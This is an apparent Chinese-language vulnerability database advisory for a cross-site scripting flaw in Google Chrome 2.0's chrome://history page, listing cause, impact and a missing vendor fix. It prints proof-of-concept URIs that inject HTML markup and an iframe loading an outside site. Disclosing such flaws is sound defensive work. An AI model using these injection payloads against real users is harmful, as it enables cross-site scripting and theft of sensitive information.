ZeroBox Vulnerability Database

漏洞起因
输入验证错误
 
影响系统
Google Chrome 2.0.172 37
 
不受影响系统
 
危害
远程攻击者可以利用漏洞获得敏感信息。
 
攻击所需条件
攻击者必须构建恶意WEB页，诱使用户打开。
 
漏洞信息
Google Chrome是一款流行的WEB浏览器。
Google Chrome处理特殊构建的URI缺少充分过滤，远程攻击者可以利用漏洞进行跨站脚本攻击，获得敏感信息。
构建如下的URI，诱使用户访问，可获得目标用户敏感信息：
chrome://history/#q=%22%3E%3Cmarquee%3E%3Ch1%3Ebikolinux%3C%2Fh1%3E%3C%2
Fmarquee%3E
view-source:chrome://history/#q="><marquee><h1>bikolinux</h1></marquee>
chrome://history/#q=%22’%3E%3Ciframe%20src%3D%22http%3A%2F%2Fmalandrines
.Net%22%20height%3D%221024%22%20width%3D%22800%22%3E%3C%2Fiframe%3E
 
测试方法
 
厂商解决方案
目前没有解决方案提供：
http://www.google.com/chrome
 
漏洞提供者